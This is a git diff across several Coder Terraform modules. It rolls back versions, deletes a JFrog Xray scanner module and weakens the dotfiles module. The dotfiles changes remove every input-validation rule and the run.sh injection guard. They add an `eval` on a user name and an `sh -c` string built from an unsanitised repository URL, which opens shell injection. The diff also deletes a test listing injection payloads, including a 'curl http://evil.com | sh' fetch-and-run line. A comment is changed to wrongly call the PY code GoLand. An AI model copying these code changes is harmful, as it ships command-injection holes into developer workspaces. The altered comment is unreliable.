  agent_id = coder_agent.example.id
 }

 module "dotfiles-root" {
  count        = data.coder_workspace.me.start_count
  source       = "registry.coder.com/coder/dotfiles/coder"
-  version      = "1.4.1"
+  version      = "1.2.3"
  agent_id     = coder_agent.example.id
  user         = "root"
  dotfiles_uri = module.dotfiles.dotfiles_uri
 }
 ```

-## SSH vs HTTPS URLs
-
-If your Git provider (e.g. GitLab, GitHub Enterprise) restricts HTTPS cloning, use an SSH URL instead:
-
-```text
-# HTTPS (may fail if HTTP cloning is disabled)
-https://gitlab.example.com/user/dotfiles.git
-
-# SSH (uses the workspace's SSH key)
-git@gitlab.example.com:user/dotfiles.git
-```
-
-When a Git provider has HTTPS cloning disabled server-side, the clone will silently fail (the `.git` folder may exist but the working tree will be empty). SSH URLs avoid this because they authenticate with the workspace's SSH key instead of a token-based HTTPS flow.
-
 ## Setting a default dotfiles repository

 You can set a default dotfiles repository for all users by setting the `default_dotfiles_uri` variable:
@@ -90,7 +76,7 @@ You can set a default dotfiles repository for all users by setting the `default_
 module "dotfiles" {
  count                = data.coder_workspace.me.start_count
  source               = "registry.coder.com/coder/dotfiles/coder"
-  version              = "1.4.1"
+  version              = "1.2.3"
  agent_id             = coder_agent.example.id
  default_dotfiles_uri = "https://github.com/coder/dotfiles"
 }
@@ -12,63 +12,20 @@ describe("dotfiles", async () => {
    agent_id: "foo",
  });

-  it("default output is empty string", async () => {
+  it("default output", async () => {
    const state = await runTerraformApply(import.meta.dir, {
      agent_id: "foo",
    });
    expect(state.outputs.dotfiles_uri.value).toBe("");
  });

-  it("accepts valid git URL formats", async () => {
-    const validUrls = [
-      "https://github.com/coder/dotfiles",
-      "https://github.com/coder/dotfiles.git",
-      "git@github.com:coder/dotfiles.git",
-      "git://github.com/coder/dotfiles.git",
-      "ssh://git@github.com/coder/dotfiles.git",
-      "ssh://git@bitbucket.example.org:7999/~myusername/dotfiles.git",
-    ];
-    for (const url of validUrls) {
-      const state = await runTerraformApply(import.meta.dir, {
-        agent_id: "foo",
-        dotfiles_uri: url,
-      });
-      expect(state.outputs.dotfiles_uri.value).toBe(url);
-    }
-  });
-
-  it("rejects invalid or malicious URLs", async () => {
-    const invalidUrls = [
-      "https://github.com/user/repo; curl http://evil.com | sh",
-      "https://github.com/$(whoami)/repo",
-      "https://github.com/`id`/repo",
-      "https://github.com/user/repo|cat /etc/passwd",
-      "file:///etc/passwd",
-      "not-a-valid-url",
-    ];
-    for (const url of invalidUrls) {
-      await expect(
-        runTerraformApply(import.meta.dir, {
-          agent_id: "foo",
-          dotfiles_uri: url,
-        }),
-      ).rejects.toThrow();
-    }
-  });
-
-  it("command uses bash for fish shell compatibility", async () => {
+  it("set a default dotfiles_uri", async () => {
+    const default_dotfiles_uri = "foo";
    const state = await runTerraformApply(import.meta.dir, {
      agent_id: "foo",
-      manual_update: "true",
-      dotfiles_uri: "https://github.com/test/dotfiles",
+      default_dotfiles_uri,
    });
-
-    const app = state.resources.find(
-      (r) => r.type === "coder_app" && r.name === "dotfiles",
-    );
-
-    expect(app).toBeDefined();
-    expect(app?.instances[0]?.attributes?.command).toContain("/bin/bash -c");
+    expect(state.outputs.dotfiles_uri.value).toBe(default_dotfiles_uri);
  });

  it("set custom order for coder_parameter", async () => {
@@ -77,41 +34,7 @@ describe("dotfiles", async () => {
      agent_id: "foo",
      coder_parameter_order: order.toString(),
    });
-    expect(state.resources).toHaveLength(3);
-    const parameters = state.resources.filter(
-      (r) => r.type === "coder_parameter",
-    );
-    for (const param of parameters) {
-      expect(param.instances[0].attributes.order).toBe(order);
-    }
-  });
-
-  it("set custom dotfiles_branch", async () => {
-    const branch = "develop";
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      dotfiles_branch: branch,
-    });
    expect(state.resources).toHaveLength(2);
-    const scriptResource = state.resources.find(
-      (r) => r.type === "coder_script",
-    );
-    expect(scriptResource?.instances[0].attributes.script).toContain(
-      `DOTFILES_BRANCH="${branch}"`,
-    );
-  });
-
-  it("default dotfiles_branch creates parameter", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-    });
-    expect(state.resources).toHaveLength(3);
-    const branchParameter = state.resources.find(
-      (r) =>
-        r.type === "coder_parameter" &&
-        r.instances[0].attributes.name === "dotfiles_branch",
-    );
-    expect(branchParameter).toBeDefined();
-    expect(branchParameter?.instances[0].attributes.default).toBeNull();
+    expect(state.resources[0].instances[0].attributes.order).toBe(order);
  });
 });
@@ -29,64 +29,26 @@ variable "agent_id" {
 variable "description" {
  type        = string
  description = "A custom description for the dotfiles parameter. This is shown in the UI - and allows you to customize the instructions you give to your users."
-  default     = "Enter a URL for a [dotfiles repository](https://dotfiles.github.io) to personalize your workspace. Use an SSH URL (e.g. `git@host:user/repo`) if your Git provider restricts HTTPS cloning."
+  default     = "Enter a URL for a [dotfiles repository](https://dotfiles.github.io) to personalize your workspace"
 }

 variable "default_dotfiles_uri" {
  type        = string
  description = "The default dotfiles URI if the workspace user does not provide one"
  default     = ""
-
-  validation {
-    condition = (
-      var.default_dotfiles_uri == "" ||
-      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$", var.default_dotfiles_uri))
-    )
-    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
-}
-
-variable "default_dotfiles_branch" {
-  type        = string
-  description = "The default dotfiles branch if the workspace user does not provide one"
-  default     = ""
 }

 variable "dotfiles_uri" {
  type        = string
  description = "The URL to a dotfiles repository. (optional, when set, the user isn't prompted for their dotfiles)"
-  default     = null

-  validation {
-    condition = (
-      var.dotfiles_uri == null ||
-      var.dotfiles_uri == "" ||
-      can(regex("^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$", var.dotfiles_uri))
-    )
-    error_message = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
-}
-
-variable "dotfiles_branch" {
-  type        = string
-  description = "The branch to use for the dotfiles repository (optional, when set, the user isn't prompted for the branch)"
-  default     = null
-
-  validation {
-    condition     = var.dotfiles_branch == null || var.dotfiles_branch != ""
-    error_message = "dotfiles_branch cannot be an empty string. Use null to prompt the user or provide a valid branch name."
-  }
+  default = null
 }

 variable "user" {
  type        = string
  description = "The name of the user to apply the dotfiles to. (optional, applies to the current user by default)"
  default     = null
-
-  validation {
-    condition     = var.user == null || can(regex("^[a-zA-Z_][a-zA-Z0-9_-]*$", var.user))
-    error_message = "Must be a valid username without special characters."
-  }
 }

 variable "coder_parameter_order" {
@@ -101,12 +63,6 @@ variable "manual_update" {
  default     = false
 }

-variable "post_clone_script" {
-  description = "Custom script to run after applying dotfiles. Runs every time, even if dotfiles were already applied."
-  type        = string
-  default     = null
-}
-
 data "coder_parameter" "dotfiles_uri" {
  count        = var.dotfiles_uri == null ? 1 : 0
  type         = "string"
@@ -117,39 +73,18 @@ data "coder_parameter" "dotfiles_uri" {
  description  = var.description
  mutable      = true
  icon         = "/icon/dotfiles.svg"
-
-  validation {
-    regex = "^$|^(https?://|ssh://|git@|git://)[a-zA-Z0-9._/:@~-]+$"
-    error = "Must be a valid dotfiles repository URL (https, git@, or git://) without special characters."
-  }
-}
-
-data "coder_parameter" "dotfiles_branch" {
-  count        = var.dotfiles_branch == null ? 1 : 0
-  type         = "string"
-  name         = "dotfiles_branch"
-  display_name = "Dotfiles Branch"
-  order        = var.coder_parameter_order
-  default      = var.default_dotfiles_branch
-  description  = "The branch to use for the dotfiles repository"
-  mutable      = true
-  icon         = "/icon/dotfiles.svg"
 }

 locals {
-  dotfiles_uri              = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
-  dotfiles_branch           = var.dotfiles_branch != null ? var.dotfiles_branch : data.coder_parameter.dotfiles_branch[0].value
-  user                      = var.user != null ? var.user : ""
-  encoded_post_clone_script = var.post_clone_script != null ? base64encode(var.post_clone_script) : ""
+  dotfiles_uri = var.dotfiles_uri != null ? var.dotfiles_uri : data.coder_parameter.dotfiles_uri[0].value
+  user         = var.user != null ? var.user : ""
 }

 resource "coder_script" "dotfiles" {
  agent_id = var.agent_id
  script = templatefile("${path.module}/run.sh", {
    DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user,
-    DOTFILES_BRANCH : local.dotfiles_branch,
-    POST_CLONE_SCRIPT : local.encoded_post_clone_script
+    DOTFILES_USER : local.user
  })
  display_name = "Dotfiles"
  icon         = "/icon/dotfiles.svg"
@@ -164,12 +99,10 @@ resource "coder_app" "dotfiles" {
  icon         = "/icon/dotfiles.svg"
  order        = var.order
  group        = var.group
-  command = "/bin/bash -c \"$(echo ${base64encode(templatefile("${path.module}/run.sh", {
+  command = templatefile("${path.module}/run.sh", {
    DOTFILES_URI : local.dotfiles_uri,
-    DOTFILES_USER : local.user,
-    DOTFILES_BRANCH : local.dotfiles_branch,
-    POST_CLONE_SCRIPT : local.encoded_post_clone_script
-  }))} | base64 -d)\""
+    DOTFILES_USER : local.user
+  })
 }

 output "dotfiles_uri" {
@@ -4,20 +4,6 @@ set -euo pipefail

 DOTFILES_URI="${DOTFILES_URI}"
 DOTFILES_USER="${DOTFILES_USER}"
-DOTFILES_BRANCH="${DOTFILES_BRANCH}"
-
-# Validate DOTFILES_URI to prevent command injection (defense in depth)
-if [ -n "$DOTFILES_URI" ]; then
-  # shellcheck disable=SC2250
-  if [[ "$DOTFILES_URI" =~ [^a-zA-Z0-9._/:@-] ]]; then
-    echo "ERROR: DOTFILES_URI contains invalid characters" >&2
-    exit 1
-  fi
-  if ! [[ "$DOTFILES_URI" =~ ^(https?://|ssh://|git@|git://) ]]; then
-    echo "ERROR: DOTFILES_URI must be a valid repository URL (https://, http://, ssh://, git@, or git://)" >&2
-    exit 1
-  fi
-fi

 # shellcheck disable=SC2157
 if [ -n "$${DOTFILES_URI// }" ]; then
@@ -25,45 +11,17 @@ if [ -n "$${DOTFILES_URI// }" ]; then
    DOTFILES_USER="$USER"
  fi

-  if [ -n "$DOTFILES_BRANCH" ]; then
-    echo "✨ Applying dotfiles for user $DOTFILES_USER from branch $DOTFILES_BRANCH"
-  else
-    echo "✨ Applying dotfiles for user $DOTFILES_USER"
-  fi
+  echo "✨ Applying dotfiles for user $DOTFILES_USER"

  if [ "$DOTFILES_USER" = "$USER" ]; then
-    if [ -n "$DOTFILES_BRANCH" ]; then
-      coder dotfiles "$DOTFILES_URI" --branch "$DOTFILES_BRANCH" -y 2>&1 | tee ~/.dotfiles.log
-    else
-      coder dotfiles "$DOTFILES_URI" -y 2>&1 | tee ~/.dotfiles.log
-    fi
+    coder dotfiles "$DOTFILES_URI" -y 2>&1 | tee ~/.dotfiles.log
  else
-    if command -v getent > /dev/null 2>&1; then
-      DOTFILES_USER_HOME=$(getent passwd "$DOTFILES_USER" | cut -d: -f6)
-    else
-      DOTFILES_USER_HOME=$(awk -F: -v user="$DOTFILES_USER" '$1 == user {print $6}' /etc/passwd)
-    fi
-    if [ -z "$DOTFILES_USER_HOME" ]; then
-      echo "ERROR: Could not determine home directory for user $DOTFILES_USER" >&2
-      exit 1
-    fi
+    # The `eval echo ~"$DOTFILES_USER"` part is used to dynamically get the home directory of the user, see https://superuser.com/a/484280
+    # eval echo ~coder -> "/home/coder"
+    # eval echo ~root  -> "/root"

-    CODER_BIN=$(command -v coder)
-    if [ -n "$DOTFILES_BRANCH" ]; then
-      sudo -u "$DOTFILES_USER" "$CODER_BIN" dotfiles "$DOTFILES_URI" --branch "$DOTFILES_BRANCH" -y 2>&1 | tee "$DOTFILES_USER_HOME/.dotfiles.log"
-    else
-      sudo -u "$DOTFILES_USER" "$CODER_BIN" dotfiles "$DOTFILES_URI" -y 2>&1 | tee "$DOTFILES_USER_HOME/.dotfiles.log"
-    fi
+    CODER_BIN=$(which coder)
+    DOTFILES_USER_HOME=$(eval echo ~"$DOTFILES_USER")
+    sudo -u "$DOTFILES_USER" sh -c "'$CODER_BIN' dotfiles '$DOTFILES_URI' -y 2>&1 | tee '$DOTFILES_USER_HOME'/.dotfiles.log"
  fi
 fi
-
-POST_CLONE_SCRIPT="${POST_CLONE_SCRIPT}"
-
-if [ -n "$POST_CLONE_SCRIPT" ]; then
-  echo "Running post-clone script..."
-  POST_CLONE_TMP=$(mktemp)
-  echo "$POST_CLONE_SCRIPT" | base64 -d > "$POST_CLONE_TMP"
-  chmod +x "$POST_CLONE_TMP"
-  $POST_CLONE_TMP
-  rm "$POST_CLONE_TMP"
-fi
@@ -14,7 +14,7 @@ Runs a script that updates git credentials in the workspace to match the user's
 module "git-config" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/git-config/coder"
-  version  = "1.0.33"
+  version  = "1.0.32"
  agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ TODO: Add screenshot
 module "git-config" {
  count              = data.coder_workspace.me.start_count
  source             = "registry.coder.com/coder/git-config/coder"
-  version            = "1.0.33"
+  version            = "1.0.32"
  agent_id           = coder_agent.main.id
  allow_email_change = true
 }
@@ -43,7 +43,7 @@ TODO: Add screenshot
 module "git-config" {
  count                 = data.coder_workspace.me.start_count
  source                = "registry.coder.com/coder/git-config/coder"
-  version               = "1.0.33"
+  version               = "1.0.32"
  agent_id              = coder_agent.main.id
  allow_username_change = false
  allow_email_change    = false
@@ -44,9 +44,6 @@ data "coder_parameter" "user_email" {
  description  = "Git user.email to be used for commits. Leave empty to default to Coder user's email."
  display_name = "Git config user.email"
  mutable      = true
-  styling = jsonencode({
-    placeholder = data.coder_workspace_owner.me.email
-  })
 }

 data "coder_parameter" "username" {
@@ -58,9 +55,6 @@ data "coder_parameter" "username" {
  description  = "Git user.name to be used for commits. Leave empty to default to Coder user's Full Name."
  display_name = "Full Name for Git config"
  mutable      = true
-  styling = jsonencode({
-    placeholder = coalesce(data.coder_workspace_owner.me.full_name, data.coder_workspace_owner.me.name)
-  })
 }

 resource "coder_env" "git_author_name" {
@@ -14,7 +14,7 @@ This module adds JetBrains IDE buttons to launch IDEs directly from the dashboar
 module "jetbrains" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jetbrains/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
 }
@@ -39,10 +39,10 @@ When `default` contains IDE codes, those IDEs are created directly without user
 module "jetbrains" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jetbrains/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
-  default  = ["PY", "IU"] # Pre-configure PyCharm and IntelliJ IDEA
+  default  = ["PY", "IU"] # Pre-configure GoLand and IntelliJ IDEA
 }
 ```

@@ -52,7 +52,7 @@ module "jetbrains" {
 module "jetbrains" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jetbrains/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
  # Show parameter with limited options
@@ -66,7 +66,7 @@ module "jetbrains" {
 module "jetbrains" {
  count         = data.coder_workspace.me.start_count
  source        = "registry.coder.com/coder/jetbrains/coder"
-  version       = "1.3.1"
+  version       = "1.3.0"
  agent_id      = coder_agent.main.id
  folder        = "/home/coder/project"
  default       = ["IU", "PY"]
@@ -81,7 +81,7 @@ module "jetbrains" {
 module "jetbrains" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jetbrains/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
  agent_id = coder_agent.main.id
  folder   = "/workspace/project"

@@ -108,7 +108,7 @@ module "jetbrains" {
 module "jetbrains_pycharm" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jetbrains/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
  agent_id = coder_agent.main.id
  folder   = "/workspace/project"

@@ -128,7 +128,7 @@ Add helpful tooltip text that appears when users hover over the IDE app buttons:
 module "jetbrains" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/jetbrains/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
  agent_id = coder_agent.main.id
  folder   = "/home/coder/project"
  default  = ["IU", "PY"]
@@ -125,7 +125,7 @@ variable "download_base_link" {
 }

 data "http" "jetbrains_ide_versions" {
-  for_each = local.selected_ides
+  for_each = length(var.default) == 0 ? var.options : var.default
  url      = "${var.releases_base_link}/products/releases?code=${each.key}&type=${var.channel}${var.major_version == "latest" ? "&latest=true" : ""}"
 }

@@ -174,14 +174,9 @@ variable "ide_config" {
 }

 locals {
-  # Determine the user's actual IDE selection.
-  # This is computed before the HTTP data source so that version lookups
-  # are only performed for IDEs the user chose — not every option.
-  selected_ides = length(var.default) == 0 ? toset(jsondecode(coalesce(data.coder_parameter.jetbrains_ides[0].value, "[]"))) : toset(var.default)
-
  # Parse HTTP responses once with error handling for air-gapped environments
  parsed_responses = {
-    for code in local.selected_ides : code => try(
+    for code in length(var.default) == 0 ? var.options : var.default : code => try(
      jsondecode(data.http.jetbrains_ide_versions[code].response_body),
      {} # Return empty object if API call fails
    )
@@ -189,7 +184,7 @@ locals {

  # Filter the parsed response for the requested major version if not "latest"
  filtered_releases = {
-    for code in local.selected_ides : code => [
+    for code in length(var.default) == 0 ? var.options : var.default : code => [
      for r in try(local.parsed_responses[code][keys(local.parsed_responses[code])[0]], []) :
      r if var.major_version == "latest" || r.majorVersion == var.major_version
    ]
@@ -197,13 +192,13 @@ locals {

  # Select the latest release for the requested major version (first item in the filtered list)
  selected_releases = {
-    for code in local.selected_ides : code =>
+    for code in length(var.default) == 0 ? var.options : var.default : code =>
    length(local.filtered_releases[code]) > 0 ? local.filtered_releases[code][0] : null
  }

-  # Dynamically generate IDE configurations based on selected IDEs with fallback to ide_config
+  # Dynamically generate IDE configurations based on options with fallback to ide_config
  options_metadata = {
-    for code in local.selected_ides : code => {
+    for code in length(var.default) == 0 ? var.options : var.default : code => {
      icon       = var.ide_config[code].icon
      name       = var.ide_config[code].name
      identifier = code
@@ -216,6 +211,9 @@ locals {
      json_data = local.selected_releases[code]
    }
  }
+
+  # Convert the parameter value to a set for for_each
+  selected_ides = length(var.default) == 0 ? toset(jsondecode(coalesce(data.coder_parameter.jetbrains_ides[0].value, "[]"))) : toset(var.default)
 }

 data "coder_parameter" "jetbrains_ides" {
@@ -1,75 +0,0 @@
---
-display_name: JFrog Xray
-description: Fetch container image vulnerability scan results from JFrog Xray
-icon: ../../../../.icons/jfrog-xray.svg
-verified: true
-tags: [jfrog, xray]
---
-
-# JFrog Xray
-
-This module fetches vulnerability scan results from JFrog Xray for container images stored in Artifactory. Use the outputs to display security information as workspace metadata.
-
-```tf
-module "jfrog_xray" {
-  source  = "registry.coder.com/coder/jfrog-xray/coder"
-  version = "1.0.0"
-
-  xray_url   = "https://example.jfrog.io/xray"
-  xray_token = var.artifactory_access_token
-  image      = "docker-local/myapp/backend:v1.0.0"
-}
-
-resource "coder_metadata" "xray_scan" {
-  count       = data.coder_workspace.me.start_count
-  resource_id = docker_container.workspace[0].id
-  icon        = "/icon/shield.svg"
-
-  item {
-    key   = "Image"
-    value = "docker-local/myapp/backend:v1.0.0"
-  }
-  item {
-    key   = "Total Vulnerabilities"
-    value = module.jfrog_xray.total
-  }
-  item {
-    key   = "Critical"
-    value = module.jfrog_xray.critical
-  }
-  item {
-    key   = "High"
-    value = module.jfrog_xray.high
-  }
-  item {
-    key   = "Medium"
-    value = module.jfrog_xray.medium
-  }
-  item {
-    key   = "Low"
-    value = module.jfrog_xray.low
-  }
-}
-```
-
-## Prerequisites
-
-1. Container images must be stored in JFrog Artifactory
-2. JFrog Xray must be configured to scan your repositories
-3. A valid JFrog access token with Xray read permissions
-
-## Remote Repositories
-
-When scanning images from remote (proxy) repositories, set `use_cache_repo = true`. This is because Artifactory stores cached images in a companion `-cache` repository where Xray indexes the scan results.
-
-```tf
-module "jfrog_xray" {
-  source  = "registry.coder.com/coder/jfrog-xray/coder"
-  version = "1.0.0"
-
-  xray_url       = "https://example.jfrog.io/xray"
-  xray_token     = var.artifactory_access_token
-  image          = "docker-remote/library/nginx:latest"
-  use_cache_repo = true
-}
-```
@@ -1,244 +0,0 @@
-import { serve } from "bun";
-import { describe, expect, it } from "bun:test";
-import { createJSONResponse, runTerraformInit, runTerraformApply } from "~test";
-
-describe("jfrog-xray", async () => {
-  await runTerraformInit(import.meta.dir);
-
-  // Mock server simulating a local repo with direct scan results
-  const mockLocalRepo = serve({
-    fetch: (req) => {
-      const url = new URL(req.url);
-      if (url.pathname === "/xray/api/v1/system/version")
-        return createJSONResponse({
-          xray_version: "3.80.0",
-          xray_revision: "abc123",
-        });
-      if (url.pathname === "/xray/api/v1/artifacts")
-        return createJSONResponse({
-          data: [
-            {
-              name: "myapp/backend/v1.0.0",
-              repo_path: "/myapp/backend/v1.0.0/manifest.json",
-              size: "50.00 MB",
-              sec_issues: {
-                critical: 1,
-                high: 3,
-                medium: 5,
-                low: 10,
-                total: 19,
-              },
-              scans_status: {
-                overall: {
-                  status: "DONE",
-                  time: "2026-03-04T22:00:02Z",
-                },
-              },
-              violations: 0,
-            },
-          ],
-          offset: 0,
-        });
-      return createJSONResponse({});
-    },
-    port: 0,
-  });
-
-  // Mock server simulating a remote repo with cache behavior
-  // Returns both tag manifest (0 vulns, 0 size) and SHA manifest (real vulns, real size)
-  const mockRemoteRepo = serve({
-    fetch: (req) => {
-      const url = new URL(req.url);
-      if (url.pathname === "/xray/api/v1/system/version")
-        return createJSONResponse({
-          xray_version: "3.80.0",
-          xray_revision: "abc123",
-        });
-      if (url.pathname === "/xray/api/v1/artifacts")
-        return createJSONResponse({
-          data: [
-            {
-              name: "codercom/enterprise-base/ubuntu",
-              repo_path: "/codercom/enterprise-base/ubuntu/list.manifest.json",
-              size: "0.00 B",
-              sec_issues: { total: 0 },
-              scans_status: {
-                overall: { status: "DONE" },
-              },
-              violations: 0,
-            },
-            {
-              name: "codercom/enterprise-base/sha256__abc123def456",
-              repo_path:
-                "/codercom/enterprise-base/sha256__abc123def456/manifest.json",
-              size: "359.33 MB",
-              sec_issues: {
-                critical: 2,
-                high: 6,
-                medium: 20,
-                low: 23,
-                total: 51,
-              },
-              scans_status: {
-                overall: { status: "DONE" },
-              },
-              violations: 2,
-            },
-          ],
-          offset: 0,
-        });
-      return createJSONResponse({});
-    },
-    port: 0,
-  });
-
-  // Mock server returning empty results (image not scanned)
-  const mockEmptyResults = serve({
-    fetch: (req) => {
-      const url = new URL(req.url);
-      if (url.pathname === "/xray/api/v1/system/version")
-        return createJSONResponse({
-          xray_version: "3.80.0",
-          xray_revision: "abc123",
-        });
-      if (url.pathname === "/xray/api/v1/artifacts")
-        return createJSONResponse({ data: [], offset: -1 });
-      return createJSONResponse({});
-    },
-    port: 0,
-  });
-
-  const localRepoUrl = `http://${mockLocalRepo.hostname}:${mockLocalRepo.port}`;
-  const remoteRepoUrl = `http://${mockRemoteRepo.hostname}:${mockRemoteRepo.port}`;
-  const emptyResultsUrl = `http://${mockEmptyResults.hostname}:${mockEmptyResults.port}`;
-
-  const getProviderEnv = (url: string) => ({
-    XRAY_URL: url,
-    XRAY_ACCESS_TOKEN: "test-token",
-  });
-
-  it("validates required variable: xray_url", async () => {
-    try {
-      await runTerraformApply(
-        import.meta.dir,
-        {
-          xray_token: "test-token",
-          image: "docker-local/test/image:latest",
-        },
-        getProviderEnv(localRepoUrl),
-      );
-      throw new Error("Expected apply to fail without xray_url");
-    } catch (ex) {
-      if (!(ex instanceof Error)) throw new Error("Unknown error");
-      expect(ex.message).toContain('input variable "xray_url" is not set');
-    }
-  });
-
-  it("validates required variable: xray_token", async () => {
-    try {
-      await runTerraformApply(
-        import.meta.dir,
-        {
-          xray_url: localRepoUrl,
-          image: "docker-local/test/image:latest",
-        },
-        getProviderEnv(localRepoUrl),
-      );
-      throw new Error("Expected apply to fail without xray_token");
-    } catch (ex) {
-      if (!(ex instanceof Error)) throw new Error("Unknown error");
-      expect(ex.message).toContain('input variable "xray_token" is not set');
-    }
-  });
-
-  it("validates required variable: image", async () => {
-    try {
-      await runTerraformApply(
-        import.meta.dir,
-        {
-          xray_url: localRepoUrl,
-          xray_token: "test-token",
-        },
-        getProviderEnv(localRepoUrl),
-      );
-      throw new Error("Expected apply to fail without image");
-    } catch (ex) {
-      if (!(ex instanceof Error)) throw new Error("Unknown error");
-      expect(ex.message).toContain('input variable "image" is not set');
-    }
-  });
-
-  it("returns vulnerability counts for local repository", async () => {
-    const state = await runTerraformApply(
-      import.meta.dir,
-      {
-        xray_url: localRepoUrl,
-        xray_token: "test-token",
-        image: "docker-local/myapp/backend:v1.0.0",
-      },
-      getProviderEnv(localRepoUrl),
-    );
-
-    expect(state.outputs.critical.value).toBe(1);
-    expect(state.outputs.high.value).toBe(3);
-    expect(state.outputs.medium.value).toBe(5);
-    expect(state.outputs.low.value).toBe(10);
-    expect(state.outputs.total.value).toBe(19);
-  });
-
-  it("returns zero counts when image has no scan results", async () => {
-    const state = await runTerraformApply(
-      import.meta.dir,
-      {
-        xray_url: emptyResultsUrl,
-        xray_token: "test-token",
-        image: "docker-local/unscanned/image:latest",
-      },
-      getProviderEnv(emptyResultsUrl),
-    );
-
-    expect(state.outputs.critical.value).toBe(0);
-    expect(state.outputs.high.value).toBe(0);
-    expect(state.outputs.medium.value).toBe(0);
-    expect(state.outputs.low.value).toBe(0);
-    expect(state.outputs.total.value).toBe(0);
-  });
-
-  it("uses cache repo when use_cache_repo is enabled", async () => {
-    const state = await runTerraformApply(
-      import.meta.dir,
-      {
-        xray_url: remoteRepoUrl,
-        xray_token: "test-token",
-        image: "docker-remote/codercom/enterprise-base:ubuntu",
-        use_cache_repo: true,
-      },
-      getProviderEnv(remoteRepoUrl),
-    );
-
-    // Should find the SHA artifact with actual vulnerabilities
-    expect(state.outputs.critical.value).toBe(2);
-    expect(state.outputs.high.value).toBe(6);
-    expect(state.outputs.medium.value).toBe(20);
-    expect(state.outputs.low.value).toBe(23);
-    expect(state.outputs.total.value).toBe(51);
-    expect(state.outputs.violations.value).toBe(2);
-    expect(state.outputs.artifact_name.value).toContain("sha256__");
-  });
-
-  it("allows custom repo and repo_path override", async () => {
-    const state = await runTerraformApply(
-      import.meta.dir,
-      {
-        xray_url: localRepoUrl,
-        xray_token: "test-token",
-        image: "ignored/path:tag",
-        repo: "docker-local",
-        repo_path: "/myapp/backend/v1.0.0",
-      },
-      getProviderEnv(localRepoUrl),
-    );
-
-    expect(state.outputs.total.value).toBe(19);
-  });
-});
@@ -1,135 +0,0 @@
-terraform {
-  required_version = ">= 1.0"
-
-  required_providers {
-    xray = {
-      source  = "jfrog/xray"
-      version = ">= 2.0"
-    }
-  }
-}
-
-provider "xray" {
-  url          = var.xray_url
-  access_token = var.xray_token
-}
-
-variable "xray_url" {
-  description = "The URL of your JFrog Xray instance (e.g., https://mycompany.jfrog.io/xray). This should point to the Xray API endpoint, not Artifactory."
-  type        = string
-  validation {
-    condition     = can(regex("^https?://", var.xray_url))
-    error_message = "The xray_url must be a valid URL starting with http:// or https://."
-  }
-}
-
-variable "xray_token" {
-  description = "The access token for authenticating with JFrog Xray. This token needs read permissions on Xray scan results. You can generate one in JFrog Platform under User Management > Access Tokens."
-  type        = string
-  sensitive   = true
-}
-
-variable "image" {
-  description = "The Docker image to check for vulnerabilities, in the format 'repo/path/image:tag'. For example: 'docker-local/myapp/backend:v1.0.0' or 'docker-remote/library/nginx:latest'. The repository name is extracted from the first path segment."
-  type        = string
-  validation {
-    condition     = length(split("/", var.image)) >= 2
-    error_message = "The image must include at least a repository and image name (e.g., 'docker-local/myimage:tag')."
-  }
-}
-
-variable "repo" {
-  description = "Override the repository name extracted from the image path. Use this when your Artifactory repository name differs from the first segment of your image path."
-  type        = string
-  default     = ""
-}
-
-variable "repo_path" {
-  description = "Override the full Xray repository path. Use this for custom path structures that don't follow the standard 'repo/image:tag' format. When set, this takes precedence over automatic path construction."
-  type        = string
-  default     = ""
-}
-
-variable "use_cache_repo" {
-  description = "Set to true when scanning images from remote (proxy) repositories. Remote repositories in Artifactory store cached artifacts in a companion '-cache' repository (e.g., 'docker-remote-cache'), which is where Xray indexes the scan results."
-  type        = bool
-  default     = false
-}
-
-locals {
-  # Parse the image string into components
-  # Example: "docker-local/myapp/backend:v1.0.0"
-  #   -> repo: "docker-local", image_name: "myapp/backend", tag: "v1.0.0"
-  image_parts = split("/", var.image)
-  base_repo   = var.repo != "" ? var.repo : local.image_parts[0]
-  parsed_repo = var.use_cache_repo ? "${local.base_repo}-cache" : local.base_repo
-  image_path  = join("/", slice(local.image_parts, 1, length(local.image_parts)))
-  image_name  = split(":", local.image_path)[0]
-  image_tag   = length(split(":", local.image_path)) > 1 ? split(":", local.image_path)[1] : "latest"
-
-  # Construct the Xray query path based on repository type:
-  # - Local repositories: Query the exact tag path (e.g., /myapp/backend/v1.0.0)
-  # - Remote repositories: Query by image name only (e.g., /myapp/backend) because
-  #   the Terraform provider only returns the SHA manifest (with actual scan data)
-  #   when querying the broader path
-  parsed_path = var.repo_path != "" ? var.repo_path : (
-    var.use_cache_repo ? "/${local.image_name}" : "/${local.image_name}/${local.image_tag}"
-  )
-
-  results = coalesce(try(data.xray_artifacts_scan.image_scan.results, []), [])
-
-  # For remote repositories, filter to find the actual scanned image (not tag pointers):
-  # - Tag manifests have size "0.00 B" (they're just pointers to SHA manifests)
-  # - SHA manifests have actual size (e.g., "359.33 MB") and contain the real scan data
-  # For local repositories, there's typically only one result which is the actual image
-  scanned_images = var.use_cache_repo ? [
-    for r in local.results : r if r.size != "0.00 B"
-  ] : local.results
-
-  # The artifact we'll report scan results for
